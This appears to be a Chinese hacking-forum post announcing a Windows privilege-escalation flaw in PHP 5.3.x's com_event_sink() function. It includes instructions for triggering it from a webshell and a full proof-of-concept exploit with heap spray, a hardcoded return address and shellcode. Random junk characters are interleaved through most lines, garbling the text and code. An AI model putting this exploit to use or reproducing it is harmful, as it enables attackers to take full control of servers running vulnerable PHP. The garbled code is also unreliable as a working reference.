|
PHP最新版已经更新至5.4.x,不过中国大陆尚处于在5.2.x和5.3.x更替的阶段。存在漏洞的php存在于5.3.x版本中
8 c# L0 d9 C( N0 \, \8 w! O+ `' L; ~" P: `. @3 r% @3 z
测试方法如下:cmd /c x:\php\php.exe x:\test.php
' {0 n8 O' U: K: f! u& v0 P& a4 q0 Y7 |& a" n: ~" B- ]
下载php程序至本地,然后使用php.exe解析php即可。Webshell上面使用php的exec等函数执行,或者使用Wscript.shell调用cmd.exe然后 /c x:\php\php.exe x:\xxxx\test.php7 @$ ~/ @+ ` A7 t
这里是两个测试的截图:
W- j0 j9 h% C2 C/ X# @$ c$ l) }4 U. [" _$ a; L Q- l. e3 K
1 Y7 @) w$ B% O `- T+ J" H G2 r8 z: @( l
E* g+ e5 P9 u& P1 I
y1 D' Z: p+ z; |7 i
成功利用此漏洞的攻击者将获得系统的最高权限
% T' Q8 K B( Q. y+ M7 z8 t+ D8 i- T) w, m8 i6 Q( s9 x1 B) h, O
4 C- J" Y8 m& G7 e) p8 b! Z
/ h9 {, `9 u+ }: m
/ t/ ^! ^' H! h& C( f; }$ _! D. [0 j2 ?+ I% B& |2 h+ j
关于漏洞分析稍后附上。一下是PoC代码:
! H) G5 p. r- \, f+ L) h* i3 _: H) o7 q. n; [
<?php
z4 D V/ J1 f//PHP 5.3.4(Win版) com_event_sink()模型权限提升漏洞 g1 d+ O/ F k* e3 {; r8 i- l
//$eip ="\x44\x43\x42\x41";. j% O, h8 b, k8 m
$eip= "\x4b\xe8\x57\x78";
2 Q( v% e" n4 K% _$eax ="\x80\x01\x8d\x04";/ y" F7 P7 x+ `/ s
$deodrant="";
# |% ~! C8 U+ A9 G$ J$axespray = str_repeat($eip.$eax,0x80);2 \) d3 L# Z' F# ~
//048d0190
1 q6 G9 \1 M. K9 f8 t0 wecho strlen($axespray);
! h- S& h) h( f+ R3 k7 |/ Xecho "PHP 5.3.4(WIN) COM_SINK Privilege Escalation\n";
5 t3 w: B) I" D8 {$ j2 ]echo "Silic Group Hacker Army - BlackBap.Org";
* Q0 h7 Z: ~" y* z9 U" m//19200 ==4B32 4b00
+ z/ a5 v K+ S- T. m/ u& Ffor($axeeffect=0;$axeeffect<0x4B32;$axeeffect++){$deodrant.=$axespray;}
$ \) p) V( ^6 W. b+ A$terminate = "T";, [. t- t, ?9 X& K2 }
$u[] =$deodrant;$ M: U+ ?/ u. w+ s; G/ \# G" ~) m
$r[] =$deodrant.$terminate;
+ E5 U1 c% X- @) C$a[] =$deodrant.$terminate;
4 R3 y2 \: w3 B/ X$s[] =$deodrant.$terminate;
& ?- C9 }- r* R/ O/ g! V//$vVar = new VARIANT(0x048d0038+$offset); 这里是可控可改的
' ?# [1 Y9 n' [+ [ _% H$vVar = new VARIANT(0x048d0000+180);/ u/ k- i4 C+ {2 Y! \! v
//弹窗代码(Shellcode)2 t% b8 C' f( V7 z
$buffer = "\x90\x90\x90"."\xB9\x38\xDD\x82\x7C\x33\xC0\xBB"."\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";- l# A, j1 N* I+ D! Y
$var2 = new VARIANT(0x41414242);, t1 x1 c7 {( o2 s
com_event_sink($vVar,$var2,$buffer);' d: t6 @# {! _5 n* r
?>1 f1 u2 r; F, v& n: G1 w4 d; n0 H
|
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
|